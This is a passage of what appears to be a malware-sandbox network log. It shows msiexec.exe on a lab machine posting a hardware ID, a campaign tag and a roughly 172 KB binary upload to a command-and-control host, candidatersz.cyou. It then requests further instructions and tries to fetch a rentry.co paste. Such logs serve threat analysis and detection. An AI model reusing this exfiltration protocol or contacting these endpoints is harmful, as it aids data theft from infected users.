00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-11-22 15:35:49 UTC	1048	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 15:35:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=j55a7p1b2dl18t4etf1gv1m12t; expires=Tue, 18-Mar-2025 09:22:28 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=19aeRbB5%2BJl90O4pJG5z%2BIIdZfEyKPYO2LtP8TofNCvwif%2FieDmmgTi0Frm5LAfoB6JoabMBac6mZAxv9bZidErU5YtEJe%2BKeeOEvfVc7NujppiO1K01e5rrJjlMna6QAA%2FLew%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e69fdd438537d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1975&rtt_var=753&sent=17&recv=26&lost=0&retrans=0&sent_bytes=2842&recv_bytes=21396&delivery_rate=1442687&cwnd=241&unsent_bytes=0&cid=15d69a38457a0ca1&ts=890&x=0"
2024-11-22 15:35:49 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-22 15:35:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	104.21.56.6	443	2208	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 15:35:51 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=7NVFDKPPXQT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1203 Host: candidatersz.cyou
2024-11-22 15:35:51 UTC	1203	OUT	Data Raw: 2d 2d 37 4e 56 46 44 4b 50 50 58 51 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 43 31 34 44 44 37 44 43 43 44 44 45 46 43 37 38 33 43 31 42 39 35 41 30 36 38 32 44 35 34 0d 0a 2d 2d 37 4e 56 46 44 4b 50 50 58 51 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 4e 56 46 44 4b 50 50 58 51 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 30 76 73 30 36 0d 0a 2d 2d 37 4e 56 46 44 4b 50 50 58 51 54 0d 0a 43 Data Ascii: --7NVFDKPPXQTContent-Disposition: form-data; name="hwid"DCC14DD7DCCDDEFC783C1B95A0682D54--7NVFDKPPXQTContent-Disposition: form-data; name="pid"1--7NVFDKPPXQTContent-Disposition: form-data; name="lid"MeHdy4--pl10vs06--7NVFDKPPXQTC
2024-11-22 15:35:52 UTC	1017	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 15:35:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ul79cs3rpo867gf9dn79r7692d; expires=Tue, 18-Mar-2025 09:22:31 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=93YmQ4yjWQREXqfbmZFvwXPPlclBo0BNMdpp7%2FH5qOYbq9QhqnBl6aNNrOWxRoM4L0%2FHPGfKHBwvCqeA2GQvSe%2BpcsJhXMENJCl7dOkJkhMBo3%2BbUwWRfD9e8NUrymkhOoiiAg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e69fde53dfc41bd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1930&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2114&delivery_rate=883509&cwnd=247&unsent_bytes=0&cid=197c0761575c0ab5&ts=770&x=0"
2024-11-22 15:35:52 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-22 15:35:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	104.21.56.6	443	2208	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 15:35:54 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=NKG61ESQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 171964 Host: candidatersz.cyou
2024-11-22 15:35:54 UTC	15331	OUT	Data Raw: 2d 2d 4e 4b 47 36 31 45 53 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 43 31 34 44 44 37 44 43 43 44 44 45 46 43 37 38 33 43 31 42 39 35 41 30 36 38 32 44 35 34 0d 0a 2d 2d 4e 4b 47 36 31 45 53 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 4b 47 36 31 45 53 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 30 76 73 30 36 0d 0a 2d 2d 4e 4b 47 36 31 45 53 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f Data Ascii: --NKG61ESQContent-Disposition: form-data; name="hwid"DCC14DD7DCCDDEFC783C1B95A0682D54--NKG61ESQContent-Disposition: form-data; name="pid"1--NKG61ESQContent-Disposition: form-data; name="lid"MeHdy4--pl10vs06--NKG61ESQContent-Dispo
2024-11-22 15:35:54 UTC	15331	OUT	Data Raw: fb 73 31 f6 52 93 7b f8 17 4a 52 bb 5f b5 82 bd cf 09 71 26 e3 43 1f 4a c1 fa f0 ed b9 4a db ad e9 60 6b d0 26 79 af dd ef e5 4d ef 43 5e bf c9 35 c4 4e c2 13 22 61 6a d8 b8 9f 22 40 bd 61 a3 3e 7f 7c 8d 68 38 f0 e9 3e ad 12 30 2b 3a 4a d6 bb 57 a3 ec 3d 8d 5b cd 14 f3 ce 84 95 a3 23 4f d7 d0 e4 53 58 b3 cd fb 2f bf 39 d4 4f 54 4c 1a c6 3b cb e6 1b f0 47 7d 22 f7 cf 89 f2 a0 f1 bb ef ea 49 ca 49 28 68 54 47 dd 7f 81 3f a7 34 bd 8d 6f 2f 63 3c a9 c8 a8 77 2b 4c 2b 9b 92 13 9b 6d 77 c6 b7 d7 f3 bd 17 26 5b 2d 78 0a 9a 94 bb af e3 42 c3 a7 9f 30 98 e9 3f 45 1d 74 b0 d7 34 9d cc 2a 10 74 0c ce f8 e2 03 9a 2c 24 99 98 ba 9c da b5 34 5b db fd a3 03 fb 45 33 b7 21 46 74 d2 23 4d cd 13 ce 2c 31 1c 2f d3 01 57 d8 e8 65 da da 1c 36 98 63 66 1b 66 3a 49 d8 94 07 44 Data Ascii: s1R{JR_q&CJJ`k&yMC^5N"aj"@a>\|h8>0+:JW=[#OSX/9OTL;G}"II(hTG?4o/c<w+L+mw&[-xB0?Et4*t,$4[E3!Ft#M,1/We6cff:ID
2024-11-22 15:35:54 UTC	15331	OUT	Data Raw: da 7f 5a 97 78 59 5c c2 3a 6e 3f 1a f9 b8 5f b0 35 ec 6b c5 58 e7 f2 be 4c 04 a9 72 33 ff 80 ef fb 60 ef 29 e5 76 da 1a 9d 3d 13 23 41 54 5e f7 8f ec df 62 9e a7 4a 1d ff 96 aa bf ab df 7d bc 7d f5 0b b9 24 41 cf 69 bb f8 f9 73 0b 35 d0 5b 0b 0a 32 1e 80 32 43 e6 03 17 a8 b7 e0 a0 b5 e6 3d b1 ac 22 f0 92 fb 3a 45 82 e8 83 bc 3b 51 66 8e 35 93 12 5a e7 d2 fc 3e 5c 2b 96 82 98 05 38 07 01 65 94 5d e8 eb 25 07 d4 df 77 af 6a e7 0e 18 11 82 fe 21 c7 d3 0f 2b ae 33 42 d7 6e 64 8f 57 2e 64 22 a3 29 61 d4 1b af 48 09 4f bf fe 6d 6f ba 79 6e 41 ec 48 b1 24 aa 49 f6 66 c9 37 64 66 d3 d1 d9 7b 5f ee 78 08 b9 49 b8 8a ae 97 9d 7f 62 f9 d0 4c f1 bf d7 e7 f7 38 60 7c dd 4c 98 60 ba 62 c9 95 35 50 55 56 88 48 a8 01 30 08 60 c6 f0 ee 05 fc 5b 1e 90 c4 5e f4 a6 18 d3 83 Data Ascii: ZxY\:n?_5kXLr3`)v=#AT^bJ}}$Ais5[22C=":E;Qf5Z>\+8e]%wj!+3BndW.d")aHOmoynAH$If7df{_xIbL8`\|L`b5PUVH0`[^
2024-11-22 15:35:54 UTC	15331	OUT	Data Raw: f4 d0 97 a3 a0 2e 04 d6 4d 54 eb 4d 07 d3 01 36 f3 50 09 c6 a2 c4 64 fc c0 85 3a f8 68 d6 36 3f 42 af f4 f6 05 6c 7d ad e4 2b 10 13 31 63 7a 31 17 45 82 36 55 4a ae e4 79 9c a7 7c 8e 53 2f ef bb f2 bb d0 2c 27 53 43 71 1a 24 f1 f0 65 9b a5 c2 64 ca 00 37 36 ec 1a 55 2d 04 1b f0 1b bf 8d b2 b8 b8 e8 f2 fa 4f fd 19 e1 cb 7f 7f 62 cc 75 85 62 93 af 6d f2 9d 55 88 7b 57 23 eb cc 3a d6 13 02 fc c1 db 87 d3 f4 de d3 b7 e1 d6 11 7d 50 12 74 b0 24 cd 8f 14 ec 95 8a 40 e5 b8 3b 05 9b f7 82 3f 2c 36 79 ab 01 8c 4f 11 d1 57 34 3c 37 f6 8b fa 1a 85 66 bc af d8 50 d7 11 53 9d 7f 7f 87 76 7a 2e f9 73 71 b6 9c 6a 9e 12 c9 96 3d 75 e5 04 f1 88 bf 52 b1 53 06 a8 b7 2d 77 ef 42 a1 d6 7a 63 ef fd 5d 92 98 85 ef 9a 00 0d 36 a1 9a 51 04 bc 7e 8d 59 70 95 b6 b6 0a f0 ab 7f eb Data Ascii: .MTM6Pd:h6?Bl}+1cz1E6UJy\|S/,'SCq$ed76U-ObubmU{W#:}Pt$@;?,6yOW4<7fPSvz.sqj=uRS-wBzc]6Q~Yp
2024-11-22 15:35:54 UTC	15331	OUT	Data Raw: f1 8d bf a6 98 5f 0e 88 72 ad e4 04 e6 0b 40 4e ae 62 ff ae 93 6c 1d bb e7 aa 8a 71 ef 55 d9 57 ef f0 a3 a9 6d fe ef 8b 4b 4f 1f 48 d4 60 8a 36 cd eb af 2a 7f 2f 01 b8 3a d3 3b 45 a1 11 e5 a2 d2 96 87 5f b7 3e e6 95 31 6d 1f 99 5e da 08 e0 46 27 b2 05 ea b5 c7 75 e9 52 17 1d a8 eb d1 ff 7b 20 74 d3 23 97 97 10 41 32 c8 e9 b4 58 a7 e3 23 70 a2 92 0f 85 1d 4c dc 17 d4 aa 12 d6 5c 2d ba b2 8b 78 33 28 2e 49 40 7a 51 f8 2a f6 db 19 1c 73 ed 27 8b c4 0f 2d 4d 2d 4d 45 07 3f 1e 3d b0 ef 77 4e b6 bd 0f 7f 8a 34 29 eb 13 14 ad a1 7f f3 ac 41 1c eb 71 f3 21 f1 3c 47 a8 9d 69 6f 91 04 7e d4 16 97 7e cd 8e c1 aa 5f 84 c1 e9 dd 95 c0 06 bd 75 a6 4a 4c 30 6a 6d f9 bf a2 bf a2 17 58 4a 41 68 f8 31 df cc f6 41 eb 5a 5d 55 a0 6b 27 38 4b 42 6e ee 69 06 92 1b 69 91 3a b9 Data Ascii: _r@NblqUWmKOH`6/:;E_>1m^F'uR{ t#A2X#pL\-x3(.I@zQs'-M-ME?=wN4)Aq!<Gio~~_uJL0jmXJAh1AZ]Uk'8KBnii:
2024-11-22 15:35:54 UTC	15331	OUT	Data Raw: ff 3c 72 f7 e6 c6 b9 f4 b9 59 1f 16 4d 3f b3 a7 e4 7e d5 87 c6 da 33 ed 5c e9 18 27 84 93 2c d4 4b be f2 b5 c9 91 b1 73 b8 22 13 40 d2 ff 27 b3 62 39 ad ad 60 61 19 f3 25 7f df bc bd 04 63 e0 ac b5 06 72 ea ea a0 b6 86 f8 5f e7 1e 2f e4 a7 36 61 00 d8 d4 d7 b6 2d d6 41 3b 0c b0 80 42 4d 8f ec de d4 e3 19 8f a7 7a e6 03 64 c7 34 84 51 5d 9b 8e 7c 50 a8 87 9b 7b a9 19 82 02 f4 26 07 3a 33 11 8a 57 b4 8f 04 59 25 60 fe 6d bc d5 3f 18 e2 0d fb aa a5 8e ef 52 2a b4 a8 80 91 87 3c ea af 42 d5 d7 ce 3f e1 16 d1 fd 73 91 81 cc a6 cc 0f 10 84 d1 89 d3 61 fc 8b 40 af 27 3d 7f cf 9b 47 65 03 a9 35 ec 67 e1 a2 01 c1 4b b4 24 e5 eb 4b 53 28 19 21 ef bd a3 d0 10 e1 f2 fd c5 6e 25 a8 7c 6d cc cf 95 3a c9 f3 3e 24 fe 73 2f b3 46 d9 ba 73 f7 1b fe 05 da 3a b1 2f 94 85 67 Data Ascii: <rYM?~3\',Ks"@'b9`a%cr_/6a-A;BMzd4Q]\|P{&:3WY%`m?R*<B?sa@'=Ge5gK$KS(!n%\|m:>$s/Fs:/g
2024-11-22 15:35:54 UTC	15331	OUT	Data Raw: d1 92 b5 e5 6b f6 b7 09 2b f6 7f 36 85 d5 0e 57 f6 1c b8 9a cb f9 68 97 6e 8e 88 4e eb be d1 04 1d 4e bb 9b 07 d0 b8 e2 6c 0b cc 26 46 fb 8d 59 96 77 a0 f5 fd a5 5c 88 5c 08 15 a5 36 46 dc e4 42 ed 6b 38 f4 80 30 0d 16 c3 52 d4 be 09 fa d3 f6 f0 cf 95 1f 80 58 03 62 a7 43 82 18 90 04 41 69 dd ea c8 fb 46 f9 cc 15 74 b8 e7 b6 f3 71 e6 08 8a 71 94 c6 5d 2c d9 f7 76 43 4b 9a 7a 45 72 87 7a 9b 0c 4e 0a bc ca be a3 fd 7e d2 10 21 16 64 12 10 e6 52 7f d4 38 eb 82 37 57 1a 8f d7 e8 64 c4 69 8d 8e d8 0f b3 fd a5 0a ac 41 e9 fd 93 1d f7 f5 d7 4e 2b 65 a6 ee 84 cd db 42 14 a0 e0 a7 b3 91 00 8a 7b 5e 5f 1e 37 62 fc 3e 6c 59 be 48 f7 95 81 0a 4a cb 2d d4 d5 4e 74 00 09 1a ec 64 00 3d 8e f3 41 35 20 d9 3d 03 8b 52 65 ba 6e 4f 32 2a 93 c3 3f c7 56 9b 52 9f 2c a1 bc b7 Data Ascii: k+6WhnNNl&FYw\\6FBk80RXbCAiFtqq],vCKzErzN~!dR87WdiAN+eB{^_7b>lYHJ-Ntd=A5 =RenO2*?VR,
2024-11-22 15:35:54 UTC	15331	OUT	Data Raw: 25 9b 49 d3 79 5a eb e8 af 22 a3 d5 91 90 5a 10 08 5e 85 72 bf 54 44 cc 5f 02 61 0d 84 50 ce bf e3 f8 1f 30 e2 5e 0f 7f db b7 37 aa a1 09 94 73 26 05 67 c3 46 3d 40 3d 0d 5f 10 04 7e 6f 7f 01 e1 0b 37 c5 e5 28 7c 03 4d ff be bd 2f c7 3b 02 c4 98 f2 67 79 be df e5 43 d0 cd b3 08 cb 0f 4a 51 56 69 ff ba 79 ce e8 97 ad bc 8a f7 5f be 44 ea 2c 05 7c a6 ea 90 8c 86 14 7e 88 a1 95 fe ab e6 bf 37 35 90 72 b4 54 9f a0 39 2d 12 15 61 2f 19 f3 68 9f f8 8d 89 cd 11 fc cc e5 69 9b 06 9f ea ca de f7 84 79 78 90 35 45 00 b3 96 be 4f fe 52 a2 89 8a 6d e2 b2 02 91 6c 07 2d 15 c4 87 a1 ec 4e ee df 62 82 79 86 5d 3b 8e f8 6b 26 03 d5 39 97 19 10 81 25 9f 7a 72 a3 4f 55 c3 0c 8a 3e a2 20 9d 62 77 3d b7 80 96 b6 57 69 b9 4b 2e 3d f4 01 e6 3b ce ac 4c 04 2a 6b a8 88 a2 e7 2e Data Ascii: %IyZ"Z^rTD_aP0^7s&gF=@=_~o7(\|M/;gyCJQViy_D,\|~75rT9-a/hiyx5EORml-Nby];k&9%zrOU> bw=WiK.=;L*k.
2024-11-22 15:35:54 UTC	15331	OUT	Data Raw: f9 78 44 85 3c 10 6c 8f c0 bb 88 10 50 a4 83 8c 1c 04 c1 72 bb cf f5 c4 17 e6 41 21 00 e1 5c c0 35 24 f1 1f 46 0e 20 14 8f 9e d1 f7 39 37 a3 6e 1f a9 27 65 f1 3a c3 93 29 07 c5 71 44 03 1a 21 58 1b 1c eb 59 73 cf de 2a 88 43 fa b2 9e 76 61 d3 9a 25 08 42 4c 0b 89 a9 4b 65 f7 10 98 de 69 ee 95 a3 39 ea 2a 08 41 c7 7d ba e9 2d 90 b4 f5 32 90 b0 5d ad ef 72 86 61 bd 27 d8 6b 4f 18 d7 c3 f8 6c 6e 1e 90 bc 35 91 e1 c5 9d 58 50 ef ef 6c c5 23 44 a7 3d 08 d9 74 13 14 ed b0 7b 28 00 38 71 85 5f 92 34 b2 16 d5 3d e9 22 16 4a f6 21 f7 43 4a eb ac 9c da a0 ab a6 99 1e 12 13 42 02 56 6c 42 1c bf 79 30 ff 13 81 b3 3b c1 5a 30 67 43 01 32 33 6f bc 3b f1 2b d5 0d 49 f2 1a cd 40 c2 9f 17 96 01 b6 7f ba 0f 72 5b 5c 44 1c 06 2d 19 48 5d 5b a0 c1 0f 29 1d 06 7d ed 64 88 72 Data Ascii: xD<lPrA!\5$F 97n'e:)qD!XYsCva%BLKei9A}-2]ra'kOln5XPl#D=t{(8q_4="J!CJBVlBy0;Z0gC23o;+I@r[\D-H][)}dr
2024-11-22 15:35:54 UTC	15331	OUT	Data Raw: ab c8 5a 8b 87 bf da 48 0a 9c e6 80 2d 49 d7 6c d6 39 4f 2b 96 61 c0 65 c6 d7 59 a5 61 b3 98 e2 b3 93 40 08 7c e2 a4 b5 86 a4 a6 c2 94 ae b2 24 19 d0 2a 50 00 df 0e 31 78 d9 01 73 6a 2c fe a7 ad 67 c3 46 00 f1 39 a2 d9 92 5f bd 44 41 5e 19 3a 90 e4 39 19 93 a1 69 d2 9f 9f b7 64 5e c2 4a 0f e9 56 e1 ba c1 27 b5 0f fc 1a ea 6c e2 b3 50 49 bf b9 7e db cc 45 6a d9 9f fb c6 78 a8 75 52 f9 ef d1 9e 70 73 32 fa 97 04 2d c0 b2 6f 73 66 9b 15 2c 40 05 3c db 9b c2 90 58 61 c4 32 55 1d 7d 64 21 57 2c ef d3 a0 fe f2 dd 43 7c 80 9d 9f 30 37 32 74 15 26 4f a8 bf 3d 0f d4 c1 8a c2 ca f2 3d 49 60 3f 3a 17 84 4f f3 fe 9d 24 cb 3e d4 54 c7 3e e8 b7 8b 0f 44 79 a1 b1 32 b0 31 61 fb 4b 28 13 9b 70 6d bb d6 f3 12 8a 83 f0 c5 37 30 52 88 91 ce a1 72 4e c2 d7 6a f3 36 96 4a 36 Data Ascii: ZH-Il9O+aeYa@\|$*P1xsj,gF9_DA^:9id^JV'lPI~EjxuRps2-osf,@<Xa2U}d!W,C\|072t&O==I`?:O$>T>Dy21aK(pm70RrNj6J6
2024-11-22 15:35:55 UTC	1022	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 15:35:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7b6f11ajg4j7kuj782vufikpeb; expires=Tue, 18-Mar-2025 09:22:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WC1ecZTtJSij9aErMzHaZVqG3Qyon5PzL%2BnJwd5UreHQCYQa7ltUAzV3QOL9w1pYd6qFTVqgcpTQnP1972k2vu2UeQl2sjNMwuI8T%2BOCa1RAUmFe%2FfUO3JsMPeDZj1We3V7pAQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e69fdf539b172bc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1828&sent=61&recv=178&lost=0&retrans=0&sent_bytes=2842&recv_bytes=173358&delivery_rate=1516095&cwnd=252&unsent_bytes=0&cid=5b2905a2d23770b3&ts=1656&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	104.21.56.6	443	2208	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 15:35:57 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 85 Host: candidatersz.cyou
2024-11-22 15:35:57 UTC	85	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 31 30 76 73 30 36 26 6a 3d 26 68 77 69 64 3d 44 43 43 31 34 44 44 37 44 43 43 44 44 45 46 43 37 38 33 43 31 42 39 35 41 30 36 38 32 44 35 34 Data Ascii: act=get_message&ver=4.0&lid=MeHdy4--pl10vs06&j=&hwid=DCC14DD7DCCDDEFC783C1B95A0682D54
2024-11-22 15:35:57 UTC	1025	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 15:35:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vq8vltcp8kgbr7jat6cd8ha6ch; expires=Tue, 18-Mar-2025 09:22:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p8gbk%2Ft1Q%2Fc98vVR%2Fz1gfRDXbUMajLCwSFiUmIhlplp9n3VO7FYF3CeDkGz%2FF0R%2FmEJduUaLq2%2BQH4rkfEkMf8N6V8XsG%2BVVlXFJAprk43F6duva7NPo8BIXqIW%2FK7u7DLPpAg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e69fe084a3c8c93-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1828&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=986&delivery_rate=1579232&cwnd=199&unsent_bytes=0&cid=3d714c2e10309c48&ts=703&x=0"
2024-11-22 15:35:57 UTC	126	IN	Data Raw: 37 38 0d 0a 33 56 4e 6b 55 49 53 61 75 59 2b 64 41 36 52 53 2b 75 74 54 5a 71 7a 30 32 2f 72 55 6b 57 6f 76 4b 4e 6b 56 55 4a 79 67 50 51 2b 47 4b 45 59 6c 70 71 43 62 35 2b 6c 33 31 43 48 41 74 33 77 36 67 34 61 2b 6c 4b 44 6a 45 77 46 4c 74 6b 6c 2f 2b 73 56 53 65 72 67 6b 41 57 58 59 74 63 76 75 36 69 47 49 63 4a 79 66 63 56 79 65 32 50 6d 66 39 71 74 61 55 6e 55 3d 0d 0a Data Ascii: 783VNkUISauY+dA6RS+utTZqz02/rUkWovKNkVUJygPQ+GKEYlpqCb5+l31CHAt3w6g4a+lKDjEwFLtkl/+sVSergkAWXYtcvu6iGIcJyfcVye2Pmf9qtaUnU=
2024-11-22 15:35:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	172.67.75.40	443	2208	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 15:35:59 UTC	196	OUT	GET /feouewe5/raw HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: rentry.co
2024-11-22 15:35:59 UTC	1279	IN	HTTP/1.1 403 Forbidden Date: Fri, 22 Nov 2024 15:35:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 8771 Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-11-22 15:35:59 UTC	887	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 73 64 31 4a 38 34 2b 77 4c 6e 6b 55 35 45 43 39 46 46 59 36 36 68 78 4e 6b 58 65 50 54 59 30 45 74 53 47 51 74 6a 2f 43 58 2b 6d 67 4d 33 66 30 4f 41 33 65 65 65 7a 45 4d 42 48 37 51 6e 63 37 71 75 6e 63 44 4f 46 4f 4b 57 31 32 5a 43 73 74 75 4b 7a 5a 79 71 65 4a 6f 42 69 39 33 36 36 55 30 42 6f 6d 79 55 72 61 4b 6a 52 6a 2f 46 52 59 4b 50 6e 4b 74 66 31 76 71 55 64 6b 33 31 36 37 57 51 37 43 64 39 68 53 41 70 30 6e 2b 2f 49 76 62 4d 35 39 46 77 3d 3d 24 4a 41 73 58 52 56 42 37 4f 59 58 39 6d 77 4c 55 4b 67 42 50 2b 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 Data Ascii: cf-chl-out: sd1J84+wLnkU5EC9FFY66hxNkXePTY0EtSGQtj/CX+mgM3f0OA3eeezEMBH7Qnc7quncDOFOKW12ZCstuKzZyqeJoBi9366U0BomyUraKjRj/FRYKPnKtf1vqUdk3167WQ7Cd9hSAp0n+/IvbM59Fw==$JAsXRVB7OYX9mwLUKgBP+A==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
